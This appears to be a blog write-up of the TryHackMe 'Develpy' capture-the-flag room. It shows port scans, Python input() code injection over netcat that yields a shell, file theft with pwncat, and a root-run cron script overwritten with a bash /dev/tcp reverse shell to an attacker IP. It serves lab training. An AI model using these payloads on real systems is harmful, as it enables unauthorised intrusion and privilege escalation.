Posts Develpy
Post
Cancel

Develpy

Description

The Following Post is writeup of Develpy room of tryhackme https://tryhackme.com/room/bsidesgtdevelpy

MachineDetail
OSLinux
RatingMedium
Creatorstuxnet

Summary

The room have 2 ports open 22 and 10000. 10000 port have python running in it and the input() function have an issue which leads to code execution. Get reverse shell as user now there is cronjob running we have rights to edit the file since it is in our home dir. Changing it leads to root.

Walkthrough

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
argenestel@parrot  ~/Desktop/tryhackme/develpyy  rustscan 10.10.252.89
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/argenestel/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.252.89:22
Open 10.10.252.89:10000
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 22,10000 10.10.252.89

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-02 16:59 IST
Initiating Ping Scan at 16:59
Scanning 10.10.252.89 [2 ports]
Completed Ping Scan at 16:59, 0.36s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:59
Completed Parallel DNS resolution of 1 host. at 16:59, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 16:59
Scanning 10.10.252.89 [2 ports]
Discovered open port 10000/tcp on 10.10.252.89
Discovered open port 22/tcp on 10.10.252.89
Completed Connect Scan at 16:59, 0.27s elapsed (2 total ports)
Nmap scan report for 10.10.252.89
Host is up, received conn-refused (0.34s latency).
Scanned at 2020-10-02 16:59:20 IST for 1s

PORT      STATE SERVICE          REASON
22/tcp    open  ssh              syn-ack
10000/tcp open  snet-sensor-mgmt syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.76 seconds
argenestel@parrot  ~/Desktop/tryhackme/develpyy  nmap -sC -sV -p22,10000 nmap/develpy - 10.10.252.89
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-02 16:59 IST
Unable to split netmask from target expression: "nmap/develpy"
Failed to resolve "-".

✘ argenestel@parrot  ~/Desktop/tryhackme/develpyy  nmap -sC -sV -p22,10000 nmap/develpy -v 10.10.252.89
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-02 16:59 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:59
Completed NSE at 16:59, 0.00s elapsed
Initiating NSE at 16:59
Completed NSE at 16:59, 0.00s elapsed
Initiating NSE at 16:59
Completed NSE at 16:59, 0.00s elapsed
Unable to split netmask from target expression: "nmap/develpy"
Initiating Ping Scan at 16:59
Scanning 10.10.252.89 [2 ports]
Completed Ping Scan at 16:59, 0.62s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:59
Completed Parallel DNS resolution of 1 host. at 16:59, 0.04s elapsed
Initiating Connect Scan at 16:59
Scanning 10.10.252.89 [2 ports]
Discovered open port 10000/tcp on 10.10.252.89
Discovered open port 22/tcp on 10.10.252.89
Completed Connect Scan at 16:59, 0.28s elapsed (2 total ports)
Initiating Service scan at 16:59
Scanning 2 services on 10.10.252.89
Completed Service scan at 17:01, 123.23s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.252.89.
Initiating NSE at 17:01
Completed NSE at 17:02, 11.72s elapsed
Initiating NSE at 17:02
Completed NSE at 17:02, 6.87s elapsed
Initiating NSE at 17:02
Completed NSE at 17:02, 0.00s elapsed
Nmap scan report for 10.10.252.89
Host is up (0.54s latency).

PORT      STATE SERVICE           VERSION
22/tcp    open  ssh               OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 78:c4:40:84:f4:42:13:8e:79:f8:6b:e4:6d:bf:d4:46 (RSA)
|   256 25:9d:f3:29:a2:62:4b:24:f2:83:36:cf:a7:75:bb:66 (ECDSA)
|_  256 e7:a0:07:b0:b9:cb:74:e9:d6:16:7d:7a:67:fe:c1:1d (ED25519)
10000/tcp open  snet-sensor-mgmt?
| fingerprint-strings:
|   GenericLines:
|     Private 0days
|     Please enther number of exploits to send??: Traceback (most recent call last):
|     File "./exploit.py", line 6, in <module>
|     num_exploits = int(input(' Please enther number of exploits to send??: '))
|     File "<string>", line 0
|     SyntaxError: unexpected EOF while parsing
|   GetRequest:
|     Private 0days
|     Please enther number of exploits to send??: Traceback (most recent call last):
|     File "./exploit.py", line 6, in <module>
|     num_exploits = int(input(' Please enther number of exploits to send??: '))
|     File "<string>", line 1, in <module>
|     NameError: name 'GET' is not defined
|   HTTPOptions, RTSPRequest:
|     Private 0days
|     Please enther number of exploits to send??: Traceback (most recent call last):
|     File "./exploit.py", line 6, in <module>
|     num_exploits = int(input(' Please enther number of exploits to send??: '))
|     File "<string>", line 1, in <module>
|     NameError: name 'OPTIONS' is not defined
|   NULL:
|     Private 0days
|_    Please enther number of exploits to send??:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port10000-TCP:V=7.80%I=7%D=10/2%Time=5F770F36%P=x86_64-pc-linux-gnu%r(N
SF:ULL,48,"\r\n\x20\x20\x20\x20\x20\x20\x20\x20Private\x200days\r\n\r\n\x2
SF:0Please\x20enther\x20number\x20of\x20exploits\x20to\x20send\?\?:\x20")%
SF:r(GetRequest,136,"\r\n\x20\x20\x20\x20\x20\x20\x20\x20Private\x200days\
SF:r\n\r\n\x20Please\x20enther\x20number\x20of\x20exploits\x20to\x20send\?
SF:\?:\x20Traceback\x20\(most\x20recent\x20call\x20last\):\r\n\x20\x20File
SF:\x20\"\./exploit\.py\",\x20line\x206,\x20in\x20<module>\r\n\x20\x20\x20
SF:\x20num_exploits\x20=\x20int\(input\('\x20Please\x20enther\x20number\x2
SF:0of\x20exploits\x20to\x20send\?\?:\x20'\)\)\r\n\x20\x20File\x20\"<strin
SF:g>\",\x20line\x201,\x20in\x20<module>\r\nNameError:\x20name\x20'GET'\x2
SF:0is\x20not\x20defined\r\n")%r(HTTPOptions,13A,"\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20Private\x200days\r\n\r\n\x20Please\x20enther\x20number\x20o
SF:f\x20exploits\x20to\x20send\?\?:\x20Traceback\x20\(most\x20recent\x20ca
SF:ll\x20last\):\r\n\x20\x20File\x20\"\./exploit\.py\",\x20line\x206,\x20i
SF:n\x20<module>\r\n\x20\x20\x20\x20num_exploits\x20=\x20int\(input\('\x20
SF:Please\x20enther\x20number\x20of\x20exploits\x20to\x20send\?\?:\x20'\)\
SF:)\r\n\x20\x20File\x20\"<string>\",\x20line\x201,\x20in\x20<module>\r\nN
SF:ameError:\x20name\x20'OPTIONS'\x20is\x20not\x20defined\r\n")%r(RTSPRequ
SF:est,13A,"\r\n\x20\x20\x20\x20\x20\x20\x20\x20Private\x200days\r\n\r\n\x
SF:20Please\x20enther\x20number\x20of\x20exploits\x20to\x20send\?\?:\x20Tr
SF:aceback\x20\(most\x20recent\x20call\x20last\):\r\n\x20\x20File\x20\"\./
SF:exploit\.py\",\x20line\x206,\x20in\x20<module>\r\n\x20\x20\x20\x20num_e
SF:xploits\x20=\x20int\(input\('\x20Please\x20enther\x20number\x20of\x20ex
SF:ploits\x20to\x20send\?\?:\x20'\)\)\r\n\x20\x20File\x20\"<string>\",\x20
SF:line\x201,\x20in\x20<module>\r\nNameError:\x20name\x20'OPTIONS'\x20is\x
SF:20not\x20defined\r\n")%r(GenericLines,13B,"\r\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20Private\x200days\r\n\r\n\x20Please\x20enther\x20number\x20of\x2
SF:0exploits\x20to\x20send\?\?:\x20Traceback\x20\(most\x20recent\x20call\x
SF:20last\):\r\n\x20\x20File\x20\"\./exploit\.py\",\x20line\x206,\x20in\x2
SF:0<module>\r\n\x20\x20\x20\x20num_exploits\x20=\x20int\(input\('\x20Plea
SF:se\x20enther\x20number\x20of\x20exploits\x20to\x20send\?\?:\x20'\)\)\r\
SF:n\x20\x20File\x20\"<string>\",\x20line\x200\r\n\x20\x20\x20\x20\r\n\x20
SF:\x20\x20\x20\^\r\nSyntaxError:\x20unexpected\x20EOF\x20while\x20parsing
SF:\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 17:02
Completed NSE at 17:02, 0.00s elapsed
Initiating NSE at 17:02
Completed NSE at 17:02, 0.00s elapsed
Initiating NSE at 17:02
Completed NSE at 17:02, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.34 seconds

Port 10000

1
2
3
4
5
6
7
8
9
10
argenestel@parrot  ~/Desktop/tryhackme/develpyy  nc 10.10.252.89 10000

        Private 0days

 Please enther number of exploits to send??: a
Traceback (most recent call last):
  File "./exploit.py", line 6, in <module>
    num_exploits = int(input(' Please enther number of exploits to send??: '))
  File "<string>", line 1, in <module>
NameError: name 'a' is not defined

so our input is converted into int

so i searched what can we do with that.

https://medium.com/@GallegoDor/python-exploitation-1-input-ac10d3f4491f

Okay we can exploit it by Sending system input.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
 ✘ argenestel@parrot  ~/Desktop/tryhackme/develpyy  nc 10.10.252.89 10000

        Private 0days

 Please enther number of exploits to send??: __import__('os').system('bash')
bash: cannot set terminal process group (752): Inappropriate ioctl for device
bash: no job control in this shell
king@ubuntu:~$



OKay got shell as king

(remote) king@ubuntu:/home/king$
[18:59:42] local terminal restored                                                                                      victim.py:790
(local) pwncat$ download credentials.png .
credentials.png ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 265.7/265.7 KB • ? • 0:00:00
[19:00:05] downloaded 265.74KiB in 5.12 seconds                                                                        download.py:79
(local) pwncat$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
total 324
drwxr-xr-x 4 king king   4096 Aug 27  2019 .
drwxr-xr-x 3 root root   4096 Aug 25  2019 ..
-rw------- 1 root root   2929 Aug 27  2019 .bash_history
-rw-r--r-- 1 king king    220 Aug 25  2019 .bash_logout
-rw-r--r-- 1 king king   3771 Aug 25  2019 .bashrc
drwx------ 2 king king   4096 Aug 25  2019 .cache
-rwxrwxrwx 1 king king 272113 Aug 27  2019 credentials.png
-rwxrwxrwx 1 king king    408 Aug 25  2019 exploit.py
drwxrwxr-x 2 king king   4096 Aug 25  2019 .nano
-rw-rw-r-- 1 king king      6 Oct  2 06:51 .pid
-rw-r--r-- 1 king king    655 Aug 25  2019 .profile
-rw-r--r-- 1 root root     32 Aug 25  2019 root.sh
-rw-rw-r-- 1 king king    139 Aug 25  2019 run.sh
-rw-r--r-- 1 king king      0 Aug 25  2019 .sudo_as_admin_successful
-rw-rw-r-- 1 king king     33 Aug 27  2019 user.txt
-rw-r--r-- 1 root root    183 Aug 25  2019 .wget-hsts
(remote) king@ubuntu:/home/king$ cat root.sh
python /root/company/media/*.py
(remote) king@ubuntu:/home/king$ cat run.sh
#!/bin/bash
kill cat /home/king/.pid
socat TCP-LISTEN:10000,reuseaddr,fork EXEC:./exploit.py,pty,stderr,echo=0 &
echo $! > /home/king/.pid
(remote) king@ubuntu:/home

okay as we can see .pid is regularly updating root.sh and run.sh may be in cron job

1
2
3
4
5
6
7
8
9
10
11
(remote) king@ubuntu:/home/king$ echo "bash -i >& /dev/tcp/10.8.108.114/8081 0>&1" > root.sh
(remote) king@ubuntu:/home/king$ cat root.sh
bash -i >& /dev/tcp/10.8.108.114/8081 0>&1

argenestel@parrot  ~/Desktop/tryhackme/develpyy   master  pwncat --listen --port 8081
[19:28:31] received connection from 10.10.252.89:51772                                                                 connect.py:148
[19:28:34] new host w/ hash 5a1b276179c0c4a1feb0f7d665a3af14                                                            victim.py:325
[19:28:48] pwncat running in /bin/bash                                                                                  victim.py:358
[19:28:57] pwncat is ready 🐈                                                                                           victim.py:768

(remote) root@ubuntu:/$

Okay got root.

This post is licensed under CC BY 4.0 by the author.